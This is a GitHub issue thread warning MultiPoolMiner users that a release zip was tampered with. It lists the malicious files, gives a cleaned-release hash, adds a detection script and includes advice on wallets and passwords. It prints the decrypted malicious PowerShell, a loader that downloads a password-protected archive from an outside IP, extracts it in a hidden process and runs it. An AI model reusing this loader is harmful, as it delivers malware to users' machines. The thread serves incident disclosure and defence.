
Important: Delete Excawataor.ps1 and check your systems for viruses #2228

Closed
UselessGuru opened this issue Nov 8, 2018 · 10 comments

@UselessGuru
Contributor

UselessGuru commented Nov 8, 2018

Important!!!

The 3.0.1 release zip file got tampered with on Oct. 18th. 2018.

I've created a cleaned release which can be downloaded here:

MultiPoolMiner_3.0.1a_Release.zip
SHA256 Hash 518C520A1B6F99306D58F2011DE96AE1BDC7CA87CEE9B0037480A8D9C0B4FE56

Actions required

Delete the following files immediately (if present):

  • [MPM-Dir]\Miners_Legacy\Excawator.ps1
  • [MPM-Dir]\Wrapper.ps1
  • [MPM-Dir]\web\parts\5.jpg
  • [MPM-Dir]\web\parts\7z.exe
  • [MPM-Dir]\web\parts\9b9ullpe9

Reboot & Check your rig for viruses
Wrapper.ps1 needs to be replaced with a file from the cleaned release (see below).

To be safe, delete the whole MPM folder (just keep the config & stat files). Then download and install MPM again.

@aaronsace

Do you have any information (or have transfer logs) to find out who uploaded the manipulated file?

What happened???

On Oct. 26th an unknown source replaced the master release file with a tampered package that contains malicious code.
Two files were tampered with:

  • [MPM-Dir]\Miners_Legacy\Excawator.ps1
  • [MPM-Dir]\Wrapper.ps1

Wrapper.ps1 calls Excawator.ps1
Excawator.ps1 is a malicious script that contains encrypted code.
The decrypted code is shown below:

$Url = "http://188.120.239.9/images/bg/5.jpg"
$file7z = ".\web\parts\5.jpg"
$filest = ".\web\parts\7z.exe"
$Path = ".\web\parts"
$Flag = ".\web\parts\9b9ullpe9"
$Pass = "3humskvm"


$isfile = Test-Path $Flag
if($isfile -eq "True") {
}
else
{

$isfile = Test-Path $filest
if($isfile -eq "True") {
}
else
{
$HTTP_Request = [System.Net.WebRequest]::Create('http://google.com')
$HTTP_Response = $HTTP_Request.GetResponse()
$HTTP_Status = [int]$HTTP_Response.StatusCode
If ($HTTP_Status -eq 200) {
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($Url,$file7z)
Invoke-CreateProcess -Binary ([IO.Path]::GetFullPath("7z.exe")) -Args "/c x -p""$Pass"" ""$file7z"" -aoa -o$Path -r" -CreationFlags 0x08000000 -ShowWindow 0x0 -StartF 0x1
Remove-Item "$file7z"
Start-Process "$filest"
$file = New-Object -TypeName System.IO.FileStream -ArgumentList $Flag,Create
$file.Close()
}
$HTTP_Response.Close()
  }
}

As some users have reported, the malicious code fails to execute and throws errors on some systems.
#2227 (comment)
#2215
We cannot say whether the exploit generally failed.

Edit: Github logs show the release was first tampered with on October 18th, up until November 4th. Changed this post to reflect that -grantemsley
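An added example (not part of the original issue or the MPM project) that performs the two checks requested above on a rig: it looks for the listed indicator files under the MPM directory and verifies the cleaned 3.0.1a zip against the posted SHA256. The `$MpmDir` and `$CleanZip` paths are assumptions; adjust them for your system.

```powershell
param(
    [string]$MpmDir   = "C:\MultiPoolMiner",   # assumed install path, not from the issue
    [string]$CleanZip = "$env:USERPROFILE\Downloads\MultiPoolMiner_3.0.1a_Release.zip"  # assumed download location
)

# Indicator files named in the issue, relative to the MPM directory
$IndicatorFiles = @(
    "Miners_Legacy\Excawator.ps1",
    "Wrapper.ps1",
    "web\parts\5.jpg",
    "web\parts\7z.exe",
    "web\parts\9b9ullpe9"
)
# SHA256 of the cleaned release zip as posted in the issue
$ExpectedHash = "518C520A1B6F99306D58F2011DE96AE1BDC7CA87CEE9B0037480A8D9C0B4FE56"

$Findings = foreach ($rel in $IndicatorFiles) {
    $full = Join-Path $MpmDir $rel
    if (Test-Path -LiteralPath $full) {
        $item = Get-Item -LiteralPath $full
        # Wrapper.ps1 exists in the clean release but must be empty (see the thread);
        # a non-empty Wrapper.ps1 or any of the other listed files is a hit.
        $suspicious = ($rel -ne "Wrapper.ps1") -or ($item.Length -gt 0)
        [pscustomobject]@{
            File       = $full
            SizeBytes  = $item.Length
            LastWrite  = $item.LastWriteTime
            Suspicious = $suspicious
        }
    }
}

if ($Findings | Where-Object Suspicious) {
    Write-Warning "Indicator files present; treat this rig as compromised:"
    $Findings | Where-Object Suspicious | Format-Table -AutoSize
} else {
    Write-Host "None of the indicator files found under $MpmDir"
}

# Verify the replacement zip before unpacking it (Get-FileHash returns uppercase hex;
# -eq compares strings case-insensitively in PowerShell)
if (Test-Path -LiteralPath $CleanZip) {
    $actual = (Get-FileHash -LiteralPath $CleanZip -Algorithm SHA256).Hash
    if ($actual -eq $ExpectedHash) { Write-Host "Cleaned zip hash matches the posted SHA256." }
    else { Write-Warning "Hash mismatch for $CleanZip : $actual" }
}
```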

@aaronsta1

this new version doesn't have that fix we just did.

@UselessGuru
Contributor Author

this new version doesn't have that fix we just did.

Correct. This will be in 3.10 Beta 9

@aaronsace
Member

@UselessGuru I don't think releases are tracked: https://github.com/organizations/MultiPoolMiner/settings/audit-log

I've changed my password as a precaution.

@UselessGuru
Contributor Author

@aaronsace

I cannot access these logs. error 404

Did you change the permissions on the repo? All collaborators have at least admin rights. ???

BTW: Any input on the changes/enhancements I made to 3.1.0 (beta)?

@grantemsley
Contributor

I've checked the security tab in my profile and don't see any suspicious logins or other activity. And my account uses 2FA. Doesn't appear to have come from my account.

@UselessGuru
Contributor Author

Nothing suspicious in my security profile. And I changed my GitHub password.

@grantemsley
Contributor

grantemsley commented Nov 8, 2018

I was able to contact github support and get a record of the changes made to that release.

@aaronsace it shows you edited the release 21 times between 2019-10-18 and 2018-10-26 - was that actually you, changing some wording or something? If not I would strongly advise you to check the security page of your profile for any suspicious activity and anything else that they might have done through your account. If you can I'd also make sure you're using 2FA for github. Contact me on skype if you want me to forward you the logs github sent me.

For anyone that was affected: We don't know what the payload(s) were. The files the virus downloaded from a Russian website are gone now, so I can't analyze them. If you downloaded 3.0.1 any time between October 18 and November 09, I'd strongly recommend you carefully check your systems for viruses, or better yet wipe them completely.

If you store your bitcoin wallet on the same computer you mine on, I'd also encourage you to create a new wallet from a computer you know isn't affected, and transfer any bitcoin you have to that new wallet. This is just a precaution - we don't know what the payload did, or what they were after. But since they specifically targeted mining software, there's a good chance they'd try to go after people's wallets.

Likewise, changing passwords to miningpoolhub, any exchanges you use, or just all websites in general would be a good precaution.

@carlo0000

carlo0000 commented Nov 12, 2018

I've downloaded 7a, 8a, 10 but did not see any of the files except Wrapper.ps1, but it looks like an empty file

but there is a problem with my earnings on Zpool
I have 10x 1080ti on zpool doing mostly x16r the whole day; I see on the graphics it's 99% x16r

0,00095 ±10 % x2 (2 computers)

but I earned in the last 24h 0.000395 and the day before 0.000627 and the day before 0.000062
??? what the hell, I only have 2 pools, and I checked multipool computers did not go there

I think removing the x16r algo

@UselessGuru
Contributor Author

@carlo0000

I've downloaded 7a, 8a, 10 but did not see any of the files except Wrapper.ps1, but it looks like an empty file

Wrapper.ps1 needs to be empty. That is OK.

have 10x 1080ti on zpool doing mostly x16r the whole day I see on the graphics it's 99% x1
Maybe your stat got corrupted. Try Reset-Stats.bat

@carlo0000

carlo0000 commented Nov 12, 2018

I asked on zpool chat; they said x16r was not good to mine, I should remove the algo.
I was earning less than 25% of what it should be; the best day was 50%.
Very bad, they're doing eth now.
